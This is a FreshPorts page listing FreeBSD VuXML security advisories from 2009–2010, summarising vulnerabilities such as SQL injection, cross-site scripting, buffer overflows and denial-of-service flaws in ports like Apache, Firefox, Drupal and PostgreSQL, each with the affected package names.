This page displays vulnerability information about FreeBSD Ports.
The last vuln.xml file processed by FreshPorts is:
Revision: 1.2112 Date: 2010/02/08 Time: 16:38:40 Committer: skv
VuXML entries as processed by FreshPorts

| Date | Description | Port(s) |
|---|---|---|
| 2010-02-08 | OTRS Security Advisory reports: Missing security quoting for SQL statements allows agents and customers to manipulate SQL queries. So it's possible for authenticated users to inject SQL queries via string manipulation of statements. A malicious user may be able to manipulate SQL queries to read or modify records in the database. This way it could also be possible to get access to more permissions (e.g. administrator permissions). To use this vulnerability the malicious user needs to have a valid Agent- or Customer-session. more... | otrs |
| 2010-02-03* | Apache ChangeLog reports: Integer overflow in the ap_proxy_send_fb function in proxy/proxy_util.c in mod_proxy in the Apache HTTP Server before 1.3.42 on 64-bit platforms allows remote origin servers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a large chunk size that triggers a heap-based buffer overflow. more... | apache apache+ipv6 apache+mod_perl apache+mod_ssl apache+mod_ssl+ipv6 apache+mod_ssl+mod_accel apache+mod_ssl+mod_accel+ipv6 apache+mod_ssl+mod_accel+mod_deflate apache+mod_ssl+mod_accel+mod_deflate+ipv6 apache+mod_ssl+mod_deflate apache+mod_ssl+mod_deflate+ipv6 apache+mod_ssl+mod_snmp apache+mod_ssl+mod_snmp+mod_accel apache+mod_ssl+mod_snmp+mod_accel+ipv6 apache+mod_ssl+mod_snmp+mod_accel+mod_deflate+ipv6 apache+mod_ssl+mod_snmp+mod_deflate apache+mod_ssl+mod_snmp+mod_deflate+ipv6 apache+ssl apache_fp ru-apache ru-apache+mod_ssl |
| 2010-02-02* | Squid security advisory 2010:1 reports: Due to incorrect data validation Squid is vulnerable to a denial of service attack when processing specially crafted DNS packets. This problem allows any trusted client or external server who can determine the squid receiving port to perform a short-term denial of service attack on the Squid service. more... | squid |
| 2010-02-01 | A Bugzilla Security Advisory reports: When moving a bug from one product to another, an intermediate page is displayed letting you select the groups the bug should be restricted to in the new product. However, a regression in the 3.4.x series made it ignore all groups which are not available in both products. As a workaround, you had to move the bug to the new product first and then restrict it to the desired groups, in two distinct steps, which could make the bug temporarily public. more... | bugzilla |
| 2010-01-28 | SecurityFocus reports: The first affects the /quote HELP module and allows a user to trigger an IRCD crash on some platforms. The second affects the /links processing module when the flatten_links configuration option is not enabled. more... | ircd-ratbox ircd-ratbox-devel |
| 2010-01-21* | Mozilla Project reports: MFSA 2009-71 GeckoActiveXObject exception messages can be used to enumerate installed COM objects MFSA 2009-70 Privilege escalation via chrome window.opener MFSA 2009-69 Location bar spoofing vulnerabilities MFSA 2009-68 NTLM reflection vulnerability MFSA 2009-67 Integer overflow, crash in libtheora video library MFSA 2009-66 Memory safety fixes in liboggplay media library MFSA 2009-65 Crashes with evidence of memory corruption (rv:1.9.1.6/ 1.9.0.16) more... | firefox linux-firefox linux-seamonkey seamonkey thunderbird |
| 2010-01-18 | Dokuwiki reports: The plugin does no checks against cross-site request forgeries (CSRF) which can be exploited to e.g. change the access control rules by tricking a logged in administrator into visiting a malicious web site. The bug allows listing the names of arbitrary files on the webserver - not their contents. This could leak private information about wiki pages and server structure. more... | dokuwiki |
| 2010-01-11 | The Zend Framework team reports: Potential XSS or HTML Injection vector in Zend_Json. Potential XSS vector in Zend_Service_ReCaptcha_MailHide. Potential MIME-type Injection in Zend_File_Transfer. Potential XSS vector in Zend_Filter_StripTags when comments allowed. Potential XSS vector in Zend_Dojo_View_Helper_Editor. Potential XSS vectors due to inconsistent encodings. XSS vector in Zend_Filter_StripTags. LFI vector in Zend_View::setScriptPath() and render(). more... | ZendFramework |
| 2010-01-09 | PowerDNS Security Advisory reports: PowerDNS Recursor up to and including 3.1.7.1 can be brought down and probably exploited. PowerDNS Recursor up to and including 3.1.7.1 can be spoofed into accepting bogus data. more... | powerdns-recursor |
| 2010-01-04 | PEAR Security Advisory reports: Multiple remote arbitrary command injections have been found in the Net_Ping and Net_Traceroute. When input from forms is used directly, the attacker could pass variables that would allow him to execute remote arbitrary command injections. more... | pear-Net_Ping pear-Net_Traceroute |
| 2009-12-25 | Drupal Team reports: The Contact module does not correctly handle certain user input when displaying category information. Users privileged to create contact categories can insert arbitrary HTML and script code into the contact module administration page. Such a cross-site scripting attack may lead to the malicious user gaining administrative access. The Menu module does not correctly handle certain user input when displaying the menu administration overview. Users privileged to create new menus can insert arbitrary HTML and script code into the menu module administration page. Such a cross-site scripting attack may lead to the malicious user gaining administrative access. more... | drupal5 drupal6 |
| 2009-12-21 | Denis Barov reports: sysutils/fuser allows user to send any signal to any process when installed with suid bit. more... | fuser |
| 2009-12-21 | Census Labs reports: We have discovered a remotely exploitable "improper input validation" vulnerability in the Monkey web server that allows an attacker to perform denial of service attacks by repeatedly crashing worker threads that process HTTP requests. more... | monkey |
| 2009-12-21* | Secunia reports: Some vulnerabilities have been reported in OpenSSL, which can be exploited by malicious people to cause a DoS. The library does not limit the number of buffered DTLS records with a future epoch. This can be exploited to exhaust all available memory via specially crafted DTLS packets. An error when processing DTLS messages can be exploited to exhaust all available memory by sending a large number of out of sequence handshake messages. more... | openssl |
| 2009-12-17 | PHP developers report: This release focuses on improving the stability of the PHP 5.2.x branch with over 60 bug fixes, some of which are security related. All users of PHP 5.2 are encouraged to upgrade to this release. Security Enhancements and Fixes in PHP 5.2.12: Fixed a safe_mode bypass in tempnam() identified by Grzegorz Stachowiak. (CVE-2009-3557, Rasmus) Fixed a open_basedir bypass in posix_mkfifo() identified by Grzegorz Stachowiak. (CVE-2009-3558, Rasmus) Added "max_file_uploads" INI directive, which can be set to limit the number of file uploads per-request to 20 by default, to prevent possible DOS via temporary file exhaustion, identified by Bogdan Calin. (CVE-2009-4017, Ilia) Added protection for $_SESSION from interrupt corruption and improved "session.save_path" check, identified by Stefan Esser. (CVE-2009-4143, Stas) Fixed bug #49785 (insufficient input string validation of htmlspecialchars()). (CVE-2009-4142, Moriyoshi, hello at iwamot dot com) more... | php5 |
| 2009-12-17 | PostgreSQL project reports: PostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23, 8.1.x before 8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9, and 8.4.x before 8.4.2 does not properly handle a '\0' character in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which (1) allows man-in-the-middle attackers to spoof arbitrary SSL-based PostgreSQL servers via a crafted server certificate issued by a legitimate Certification Authority, and (2) allows remote attackers to bypass intended client-hostname restrictions via a crafted client certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408. PostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23, 8.1.x before 8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9, and 8.4.x before 8.4.2 does not properly manage session-local state during execution of an index function by a database superuser, which allows remote authenticated users to gain privileges via a table with crafted index functions, as demonstrated by functions that modify (1) search_path or (2) a prepared statement, a related issue to CVE-2007-6600 and CVE-2009-3230. more... | postgresql-client postgresql-server |
| 2009-12-17 | SecurityFocus reports: TPTEST is prone to a remote stack-based buffer-overflow vulnerability. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. more... | tptest |
| 2009-12-14* | freeRADIUS Vulnerability Notifications reports: 2009.09.09 v1.1.7 - Anyone who can send packets to the server can crash it by sending a Tunnel-Password attribute in an Access-Request packet. This vulnerability is not otherwise exploitable. We have released 1.1.8 to correct this vulnerability. This issue is similar to the previous Tunnel-Password issue noted below. The vulnerable versions are 1.1.3 through 1.1.7. Version 2.x is not affected. more... | freeradius |
| 2009-12-14* | Mozilla Foundation reports: MFSA 2009-64 Crashes with evidence of memory corruption (rv:1.9.1.4/ 1.9.0.15) MFSA 2009-63 Upgrade media libraries to fix memory safety bugs MFSA 2009-62 Download filename spoofing with RTL override MFSA 2009-61 Cross-origin data theft through document.getSelection() MFSA 2009-59 Heap buffer overflow in string to number conversion MFSA 2009-57 Chrome privilege escalation in XPCVariant::VariantDataToJS() MFSA 2009-56 Heap buffer overflow in GIF color map parser MFSA 2009-55 Crash in proxy auto-configuration regexp parsing MFSA 2009-54 Crash with recursive web-worker calls MFSA 2009-53 Local downloaded file tampering MFSA 2009-52 Form history vulnerable to stealing more... | firefox linux-firefox linux-seamonkey seamonkey |
| 2009-12-12 | Secunia reports: Russ McRee has discovered some vulnerabilities in Pligg, which can be exploited by malicious people to conduct cross-site scripting and request forgery attacks. Input passed via the "Referer" HTTP header to various scripts (e.g. admin/admin_config.php, admin/admin_modules.php, delete.php, editlink.php, submit.php, submit_groups.php, user_add_remove_links.php, and user_settings.php) is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to e.g. create an arbitrary user with administrative privileges if a logged-in administrative user visits a malicious web site. more... | pligg |
| 2009-12-12* | Mozilla Foundation reports: MFSA 2009-32 JavaScript chrome privilege escalation MFSA 2009-31 XUL scripts bypass content-policy checks MFSA 2009-30 Incorrect principal set for file: resources loaded via location bar MFSA 2009-29 Arbitrary code execution using event listeners attached to an element whose owner document is null MFSA 2009-28 Race condition while accessing the private data of a NPObject JS wrapper class object MFSA 2009-27 SSL tampering via non-200 responses to proxy CONNECT requests MFSA 2009-26 Arbitrary domain cookie access by local file: resources MFSA 2009-25 URL spoofing with invalid unicode characters MFSA 2009-24 Crashes with evidence of memory corruption (rv:1.9.0.11) more... | firefox linux-firefox linux-firefox-devel linux-seamonkey linux-thunderbird seamonkey thunderbird |
| 2009-12-12* | Mozilla Foundation reports: MFSA 2009-22: Firefox allows Refresh header to redirect to javascript: URIs MFSA 2009-21: POST data sent to wrong site when saving web page with embedded frame MFSA 2009-20: Malicious search plugins can inject code into arbitrary sites MFSA 2009-19: Same-origin violations in XMLHttpRequest and XPCNativeWrapper.toString MFSA 2009-18: XSS hazard using third-party stylesheets and XBL bindings MFSA 2009-17: Same-origin violations when Adobe Flash loaded via view-source: scheme MFSA 2009-16: jar: scheme ignores the content-disposition: header on the inner URI MFSA 2009-15: URL spoofing with box drawing character MFSA 2009-14 Crashes with evidence of memory corruption (rv:1.9.0.9) more... | firefox linux-firefox linux-firefox-devel linux-seamonkey linux-seamonkey-devel linux-thunderbird seamonkey thunderbird |
| 2009-12-12* | Mozilla Foundation reports: MFSA 2009-06: Directives to not cache pages ignored MFSA 2009-05: XMLHttpRequest allows reading HTTPOnly cookies MFSA 2009-04: Chrome privilege escalation via local .desktop files MFSA 2009-03: Local file stealing with SessionStore MFSA 2009-02: XSS using a chrome XBL method and window.eval MFSA 2009-01: Crashes with evidence of memory corruption (rv:1.9.0.6) more... | firefox linux-firefox linux-firefox-devel linux-seamonkey linux-seamonkey-devel linux-thunderbird seamonkey thunderbird |
| 2009-12-12* | The Mozilla Foundation reports: MFSA 2008-37 UTF-8 URL stack buffer overflow MFSA 2008-38 nsXMLDocument::OnChannelRedirect() same-origin violation MFSA 2008-39 Privilege escalation using feed preview page and XSS flaw MFSA 2008-40 Forced mouse drag MFSA 2008-41 Privilege escalation via XPCnativeWrapper pollution MFSA 2008-42 Crashes with evidence of memory corruption (rv:1.9.0.2/1.8.1.17) MFSA 2008-43 BOM characters stripped from JavaScript before execution MFSA 2008-44 resource: traversal vulnerabilities MFSA 2008-45 XBM image uninitialized memory reading more... | firefox flock linux-firefox linux-firefox-devel linux-flock linux-seamonkey linux-seamonkey-devel linux-thunderbird seamonkey thunderbird |
| 2009-12-12* | Mozilla Foundation reports: Fixes for security problems in the JavaScript engine described in MFSA 2008-15 introduced a stability problem, where some users experienced crashes during JavaScript garbage collection. This is being fixed primarily to address stability concerns. We have no demonstration that this particular crash is exploitable but are issuing this advisory because some crashes of this type have been shown to be exploitable in the past. more... | firefox flock linux-firefox linux-firefox-devel linux-flock linux-seamonkey linux-seamonkey-devel linux-thunderbird seamonkey thunderbird |
| 2009-12-12* | The Mozilla Foundation reports of multiple security issues in Firefox, Seamonkey, and Thunderbird. Several of these issues can probably be used to run arbitrary code with the privilege of the user running the program. MFSA 2008-19 XUL popup spoofing variant (cross-tab popups) MFSA 2008-18 Java socket connection to any local port via LiveConnect MFSA 2008-17 Privacy issue with SSL Client Authentication MFSA 2008-16 HTTP Referrer spoofing with malformed URLs MFSA 2008-15 Crashes with evidence of memory corruption (rv:1.8.1.13) MFSA 2008-14 JavaScript privilege escalation and arbitrary code execution more... | firefox flock linux-firefox linux-firefox-devel linux-flock linux-seamonkey linux-seamonkey-devel linux-thunderbird seamonkey thunderbird |
| 2009-12-12* | The Mozilla Foundation reports of multiple security issues in Firefox, Seamonkey, and Thunderbird. Several of these issues can probably be used to run arbitrary code with the privilege of the user running the program. Web forgery overwrite with div overlay; URL token stealing via stylesheet redirect; Mishandling of locally-saved plain text files; File action dialog tampering; Possible information disclosure in BMP decoder; Web browsing history and forward navigation stealing; Directory traversal via chrome: URI; Stored password corruption; Privilege escalation, XSS, Remote Code Execution; Multiple file input focus stealing vulnerabilities; Crashes with evidence of memory corruption (rv:1.8.1.12) more... | firefox flock linux-firefox linux-firefox-devel linux-flock linux-seamonkey linux-seamonkey-devel seamonkey |
| 2009-12-11 | Secunia reports: Stefan Esser has reported a vulnerability in Piwik, which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to the core/Cookie.php script using "unserialize()" with user controlled input. This can be exploited to e.g. execute arbitrary PHP code via the "__wakeup()" or "__destruct()" methods of a serialized object passed via an HTTP cookie. more... | piwik |
| 2009-12-10 | Dovecot author reports: Dovecot v1.2.x had been creating base_dir (and its parents if necessary) with 0777 permissions. The base_dir's permissions get changed to 0755 automatically at startup, but you may need to chmod the parent directories manually. more... | dovecot |
| 2009-12-09 | Adobe Product Security Incident Response Team reports: Critical vulnerabilities have been identified in Adobe Flash Player version 10.0.32.18 and earlier. These vulnerabilities could cause the application to crash and could potentially allow an attacker to take control of the affected system. more... | linux-f10-flashplugin linux-f8-flashplugin linux-flashplugin |
| 2009-12-09 | The official ruby site reports: There is a heap overflow vulnerability in String#ljust, String#center and String#rjust. This has allowed an attacker to run arbitrary code in some rare cases. more... | ruby |
| 2009-12-09 | Secunia reports: A vulnerability has been reported in RT, which can be exploited by malicious people to conduct session fixation attacks. The vulnerability is caused due to an error in the handling of sessions and can be exploited to hijack another user's session by tricking the user into logging in after following a specially crafted link. more... | rt |
| 2009-12-08 | CVE reports: The updatePosition function in lib/xmltok_impl.c in libexpat in Expat 2.0.1, as used in Python, PyXML, w3c-libwww, and other software, allows context-dependent attackers to cause a denial of service (application crash) via an XML document with crafted UTF-8 sequences that trigger a buffer over-read. more... | expat2 |
| 2009-12-08 | CVE reports: The big2_toUtf8 function in lib/xmltok.c in libexpat in Expat 2.0.1, as used in the XML-Twig module for Perl, allows context-dependent attackers to cause a denial of service (application crash) via an XML document with malformed UTF-8 sequences that trigger a buffer over-read, related to the doProlog function in lib/xmlparse.c. more... | expat2 |
| 2009-12-01 | Opera Team reports: Fixed a heap buffer overflow in string to number conversion. Fixed an issue where error messages could leak onto unrelated sites. Fixed a moderately severe issue, as reported by Chris Evans of the Google Security Team; details will be disclosed at a later date. more... | linux-opera opera |
| 2009-11-28 | Secunia.com reports: Do not attempt to load an unqualified module.la file from the current directory (by default) since doing so is insecure and is not compliant with the documentation. more... | libtool |
| 2009-11-24 | The Ubuntu security team reports: It was discovered that libvorbis did not correctly handle certain malformed vorbis files. If a user were tricked into opening a specially crafted vorbis file with an application that uses libvorbis, an attacker could cause a denial of service or possibly execute arbitrary code with the user's privileges. more... | libvorbis |
| 2009-11-23 | A Bugzilla Security Advisory reports: When a bug is in a group, none of its information (other than its status and resolution) should be visible to users outside that group. It was discovered that as of 3.3.2, Bugzilla was showing the alias of the bug (a very short string used as a shortcut for looking up the bug) to users outside of the group, if the protected bug ended up in the "Depends On" or "Blocks" list of any other bug. more... | bugzilla |
| 2009-11-23 | The cacti development team reports: The Cross-Site Scripting patch has been posted. This patch addresses cross-site scripting issues reported by Moritz Naumann. more... | cacti |
| 2009-11-14 | Secunia reports: The security issue is caused due to the wp_check_filetype() function in /wp-includes/functions.php improperly validating uploaded files. This can be exploited to execute arbitrary PHP code by uploading a malicious PHP script with multiple extensions. Successful exploitation of this vulnerability requires that Apache is not configured to handle the mime-type for media files with an e.g. "gif", "jpg", "png", "tif", "wmv" extension. Input passed via certain parameters to press-this.php is not properly sanitised before being displayed to the user. This can be exploited to insert arbitrary HTML and script code, which will be executed in a user's browser session in context of an affected site when the malicious data is being viewed. more... | de-wordpress wordpress |
| 2009-11-09* | CVE reports: The _gdGetColors function in gd_gd.c in PHP 5.2.11 and 5.3.0, and the GD Graphics Library 2.x, does not properly verify a certain colorsTotal structure member, which might allow remote attackers to conduct buffer overflow or buffer over-read attacks via a crafted GD file, a different vulnerability than CVE-2009-3293. more... | gd php4-gd php5-gd |
| 2009-11-06 | CVE reports: The decode_entities function in util.c in HTML-Parser before 3.63 allows context-dependent attackers to cause a denial of service (infinite loop) via an incomplete SGML numeric character reference, which triggers generation of an invalid UTF-8 character. more... | p5-HTML-Parser |
| 2009-11-05 | TYPO3 develop team reports: Affected versions: TYPO3 versions 4.0.13 and below, 4.1.12 and below, 4.2.9 and below, 4.3.0beta1 and below. SQL injection, Cross-site scripting (XSS), Information disclosure, Frame hijacking, Remote shell command execution and Insecure Install Tool authentication/session handling. more... | typo3 |
| 2009-11-03 | VideoLAN reports: When parsing a MP4, ASF or AVI file with an overly deep box structure, a stack overflow might occur. It would overwrite the return address and thus redirect the execution flow. If successful, a malicious third party could trigger execution of arbitrary code within the context of the VLC media player. more... | vlc |
| 2009-11-02 | oCERT reports: Ark input sanitization errors: The KDE archiving tool, Ark, performs insufficient validation which leads to specially crafted archive files, using unknown MIME types, to be rendered using a KHTML instance; this can trigger uncontrolled XMLHTTPRequests to remote sites. IO Slaves input sanitization errors: KDE protocol handlers perform insufficient input validation; an attacker can craft a malicious URI that would trigger JavaScript execution. Additionally the 'help://' protocol handler suffers from directory traversal. It should be noted that the scope of this issue is limited as the malicious URIs cannot be embedded in Internet hosted content. KMail input sanitization errors: The KDE mail client, KMail, performs insufficient validation which leads to specially crafted email attachments, using unknown MIME types, to be rendered using a KHTML instance; this can trigger uncontrolled XMLHTTPRequests to remote sites. The exploitation of these vulnerabilities is unlikely according to Portcullis and KDE but the execution of active content is nonetheless unexpected and might pose a threat. more... | kdebase4-runtime kdelibs4 |
| 2009-10-31 | Opera Team reports: Fixed an issue where certain domain names could allow execution of arbitrary code, as reported by Chris Weber of Casaba Security. Fixed an issue where scripts can run on the feed subscription page, as reported by Inferno. more... | linux-opera opera |
| 2009-10-29* | Opera Team reports: Issue where sites using revoked intermediate certificates might be shown as secure; issue where the collapsed address bar didn't show the current domain; issue where pages could trick users into uploading files; some IDNA characters not correctly displaying in the address bar; issue where Opera accepts nulls and invalid wild-cards in certificates. more... | linux-opera opera opera-devel |
| 2009-10-28 | SecurityFocus reports: cTorrent and dTorrent are prone to a remote buffer-overflow vulnerability because the software fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. Successful exploits allow remote attackers to execute arbitrary machine code in the context of a vulnerable application. Failed exploit attempts will likely result in denial-of-service conditions. more... | ctorrent |
| 2009-10-25 | SecurityFocus reports: ELinks is prone to an off-by-one buffer-overflow vulnerability because the application fails to accurately reference the last element of a buffer. Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions. more... | elinks |
| 2009-10-22* | SquidGuard website reports: Patch 20091015 fixes one buffer overflow problem in sgLog.c when overlong URLs are requested. SquidGuard will then go into emergency mode where no blocking occurs. This is not required in this situation. Patch 20091019 fixes two bypass problems with URLs whose length is close to the limit defined by MAX_BUF (default: 4096) in squidGuard and MAX_URL (default: 4096 in squid 2.x and 8192 in squid 3.x) in squid. For this kind of URLs the proxy request exceeds MAX_BUF causing squidGuard to complain about not being able to parse the squid request. Increasing the buffer limit to be higher than the one defined in MAX_URL solves the issue. more... | squidGuard |
| 2009-10-20 | SecurityFocus reports: Some vulnerabilities have been reported in Xpdf, which can be exploited by malicious people to potentially compromise a user's system. 1) Multiple integer overflows in "SplashBitmap::SplashBitmap()" can be exploited to cause heap-based buffer overflows. 2) An integer overflow error in "ObjectStream::ObjectStream()" can be exploited to cause a heap-based buffer overflow. 3) Multiple integer overflows in "Splash::drawImage()" can be exploited to cause heap-based buffer overflows. 4) An integer overflow error in "PSOutputDev::doImageL1Sep()" can be exploited to cause a heap-based buffer overflow when converting a PDF document to a PS file. Successful exploitation of the vulnerabilities may allow execution of arbitrary code by tricking a user into opening a specially crafted PDF file. more... | xpdf |
| 2009-10-16 | Django project reports: Django's forms library includes field types which perform regular-expression-based validation of email addresses and URLs. Certain addresses/URLs could trigger a pathological performance case in these regular expressions, resulting in the server process/thread becoming unresponsive, and consuming excessive CPU over an extended period of time. If deliberately triggered, this could result in an effective denial-of-service attack. more... | py23-django py23-django-devel py24-django py24-django-devel py25-django py25-django-devel py26-django py26-django-devel py30-django py30-django-devel py31-django py31-django-devel |
| 2009-10-13 | phpMyAdmin Team reports: Cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script or HTML via a crafted MySQL table name. SQL injection vulnerability allows remote attackers to inject SQL via various interface parameters of the PDF schema generator feature. more... | phpMyAdmin phpMyAdmin211 |
| 2009-10-12 | Vendor reports: Security Enhancements and Fixes in PHP 5.2.11: Fixed certificate validation inside php_openssl_apply_verification_policy. Fixed sanity check for the color index in imagecolortransparent. Added missing sanity checks around exif processing. Fixed bug #44683 (popen crashes when an invalid mode is passed). more... | php5 |
| 2009-10-07 | Sun reports: A security vulnerability in the VBoxNetAdpCtl configuration tool for certain Sun VirtualBox 3.0 packages may allow local unprivileged users who are authorized to run VirtualBox to execute arbitrary commands with root privileges. more... | virtualbox |
| 2009-10-01* | oCERT reports: Pango suffers from a multiplicative integer overflow which may lead to a potentially exploitable, heap overflow depending on the calling conditions. For example, this vulnerability is remotely reachable in Firefox by creating an overly large document.location value but only results in a process-terminating, allocation error (denial of service). The affected function is pango_glyph_string_set_size. An overflow check when doubling the size neglects the overflow possible on the subsequent allocation. more... | linux-f10-pango linux-f8-pango linux-pango pango |
| 2009-09-30 | mybb team reports: Input passed via avatar extensions is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by uploading specially named avatars. The script allows signing up with usernames containing zero width space characters, which can be exploited to e.g. conduct spoofing attacks. more... | mybb |
| 2009-09-22 | Drupal Team reports: The core OpenID module does not correctly implement Form API for the form that allows one to link user accounts with OpenID identifiers. A malicious user is therefore able to use cross site request forgeries to add attacker controlled OpenID identities to existing accounts. These OpenID identities can then be used to gain access to the affected accounts. The OpenID module is not a compliant implementation of the OpenID Authentication 2.0 specification. An implementation error allows a user to access the account of another user when they share the same OpenID 2.0 provider. File uploads with certain extensions are not correctly processed by the File API. This may lead to the creation of files that are executable by Apache. The .htaccess that is saved into the files directory by Drupal should normally prevent execution. The files are only executable when the server is configured to ignore the directives in the .htaccess file. Drupal doesn't regenerate the session ID when an anonymous user follows the one time login link used to confirm email addresses and reset forgotten passwords. This enables a malicious user to fix and reuse the session id of a victim under certain circumstances. more... | drupal5 drupal6 |
| 2009-09-22* | The Horde team reports: An error within the form library when handling image form fields can be exploited to overwrite arbitrary local files. An error exists within the MIME Viewer library when rendering unknown text parts. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site if malicious data is viewed. The preferences system does not properly sanitise numeric preference types. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. more... | horde-base |
| 2009-09-18 | Firewall Builder release notes report: Vadim Kurland (vadim.kurland@fwbuilder.org) reports: Fwbuilder and libfwbuilder 3.0.4 through to 3.0.6 generate iptables scripts with a security issue when also used to generate static routing configurations. more... | fwbuilder |
| 2009-09-17 | A Bugzilla Security Advisory reports: It is possible to inject raw SQL into the Bugzilla database via the "Bug.create" and "Bug.search" WebService functions. When a user would change his password, his new password would be exposed in the URL field of the browser if he logged in right after changing his password. more... | bugzilla |
| 2009-09-15* | nginx development team reports: A segmentation fault might occur in a worker process while handling a specially crafted request. more... | nginx nginx-devel |
| 2009-09-14* | The Cyrus IMAP Server ChangeLog states: Fixed CERT VU#336053 - Potential buffer overflow in Sieve. more... | cyrus-imapd |
| 2009-09-13 | The IkiWiki development team reports: IkiWiki's teximg plugin's blacklisting of insecure TeX commands is insufficient; it can be bypassed and used to read arbitrary files. more... | ikiwiki |
| 2009-09-13 | Olly Betts reports: There's a cross-site scripting issue in Omega - exception messages don't currently get HTML entities escaped, but can contain CGI parameter values in some cases. more... | xapian-omega |
| 2009-09-10 | Mozilla Foundation reports: MFSA 2009-51: Chrome privilege escalation with FeedWriter; MFSA 2009-50: Location bar spoofing via tall line-height Unicode characters; MFSA 2009-49: TreeColumns dangling pointer vulnerability; MFSA 2009-48: Insufficient warning for PKCS11 module installation and removal; MFSA 2009-47: Crashes with evidence of memory corruption (rv:1.9.1.3/1.9.0.14). more... | firefox |
| 2009-09-08 | SILC ChangeLog reports: An unspecified format string vulnerability exists in silc-toolkit. more... | silc-toolkit |
| 2009-09-04* | Mozilla Project reports: MFSA 2009-38: Data corruption with SOCKS5 reply containing DNS name longer than 15 characters; MFSA 2009-42: Compromise of SSL-protected communication; MFSA 2009-43: Heap overflow in certificate regexp parsing; MFSA 2009-44: Location bar and SSL indicator spoofing via window.open() on invalid URL; MFSA 2009-45: Crashes with evidence of memory corruption (rv:1.9.1.2/1.9.0.13); MFSA 2009-46: Chrome privilege escalation due to incorrectly cached wrapper. more... | firefox linux-firefox linux-firefox-devel linux-seamonkey linux-seamonkey-devel linux-thunderbird seamonkey thunderbird |
| 2009-09-02 | Simon Kelley reports: Fix security problem which allowed any host permitted to do TFTP to possibly compromise dnsmasq by remote buffer overflow when TFTP enabled. Fix a problem which allowed a malicious TFTP client to crash dnsmasq. more... | dnsmasq |
| 2009-08-25 | Apache ChangeLog reports: CVE-2009-1891: Fix a potential Denial-of-Service attack against mod_deflate or other modules. CVE-2009-1195: Prevent the "Includes" Option from being enabled in an .htaccess file if the AllowOverride restrictions do not permit it. CVE-2009-1890: Fix a potential Denial-of-Service attack against mod_proxy in a reverse proxy configuration. CVE-2009-1191: mod_proxy_ajp: Avoid delivering content from a previous request which failed to send a request body. CVE-2009-0023, CVE-2009-1955, CVE-2009-1956: The bundled copy of the APR-util library has been updated, fixing three different security issues which may affect particular configurations and third-party modules (was already fixed in 2.2.11_5). more... | apache |
| 2009-08-20 | Secunia reports: A vulnerability has been reported in Pidgin, which can be exploited by malicious people to potentially compromise a user's system. The vulnerability is caused due to an error in the "msn_slplink_process_msg()" function when processing MSN SLP messages and can be exploited to corrupt memory. Successful exploitation may allow execution of arbitrary code. The vulnerability is reported in versions 2.5.8 and prior. Other versions may also be affected. more... | finch libpurple pidgin |
| 2009-08-17 | SecurityFocus reports: GnuTLS is prone to multiple remote vulnerabilities: A remote code-execution vulnerability. A denial-of-service vulnerability. A signature-generation vulnerability. A signature-verification vulnerability. An attacker can exploit these issues to potentially execute arbitrary code, trigger denial-of-service conditions, carry out attacks against data signed with weak signatures, and cause clients to accept expired or invalid certificates from servers. more... | gnutls gnutls-devel |
| 2009-08-17 | GnuTLS reports: By using a NUL byte in CN/SAN fields, it was possible to fool GnuTLS into 1) not printing the entire CN/SAN field value when printing a certificate and 2) cause incorrect positive matches when matching a hostname against a certificate. more... | gnutls gnutls-devel |
| 2009-08-17 | Secunia reports: A weakness has been reported in memcached, which can be exploited by malicious people to disclose system information. The weakness is caused due to the application disclosing the content of /proc/self/maps if a stats maps command is received. This can be exploited to disclose e.g. the addresses of allocated memory regions. more... | memcached |
| 2009-08-13* | WordPress reports: A specially crafted URL could be requested that would allow an attacker to bypass a security check to verify a user requested a password reset. As a result, the first account without a key in the database (usually the admin account) would have its password reset and a new password would be emailed to the account owner. more... | de-wordpress wordpress wordpress-mu |
| 2009-08-13* | Matthias Andree reports: Moxie Marlinspike demonstrated in July 2009 that some CAs would sign certificates that contain embedded NUL characters in the Common Name or subjectAltName fields of ITU-T X.509 certificates. Applications that would treat such X.509 strings as NUL-terminated C strings (rather than strings that contain an explicit length field) would only check the part up to and excluding the NUL character, so that certificate names such as www.good.example\0www.bad.example.com would be mistaken as a certificate name for www.good.example. fetchmail also had this design and implementation flaw. more... | fetchmail |
| 2009-08-11* | Joomla! Security Center reports: In com_mailto, it was possible to bypass timeout protection against sending automated emails. more... | joomla15 |
| 2009-08-07* | A Subversion Security Advisory reports: Subversion clients and servers have multiple heap overflow issues in the parsing of binary deltas. This is related to an allocation vulnerability in the APR library used by Subversion. Clients with commit access to a vulnerable server can cause a remote heap overflow; servers can cause a heap overflow on vulnerable clients that try to do a checkout or update. This can lead to a DoS (an exploit has been tested) and to arbitrary code execution (no exploit tested, but the possibility is clear). more... | p5-subversion py-subversion subversion subversion-freebsd |
| 2009-08-07* | Mozilla Project reports: Firefox user zbyte reported a crash that we determined could result in an exploitable memory corruption problem. In certain cases after a return from a native function, such as escape(), the Just-in-Time (JIT) compiler could get into a corrupt state. This could be exploited by an attacker to run arbitrary code such as installing malware. This vulnerability does not affect earlier versions of Firefox which do not support the JIT feature. more... | firefox |
| 2009-08-06* | Squid security advisory 2009:2 reports: Due to incorrect buffer limits and related bound checks Squid is vulnerable to a denial of service attack when processing specially crafted requests or responses. Due to incorrect data validation Squid is vulnerable to a denial of service attack when processing specially crafted responses. These problems allow any trusted client or external server to perform a denial of service attack on the Squid service. Squid-2.x releases are not affected. more... | squid |
| 2009-08-05 | A Bugzilla Security Advisory reports: Normally, users are only supposed to see products that they can file bugs against in the "Product" drop-down on the bug-editing page. Instead, users were being shown all products, even those that they normally could not see. Any user who could edit any bug could see all product names. more... | bugzilla |
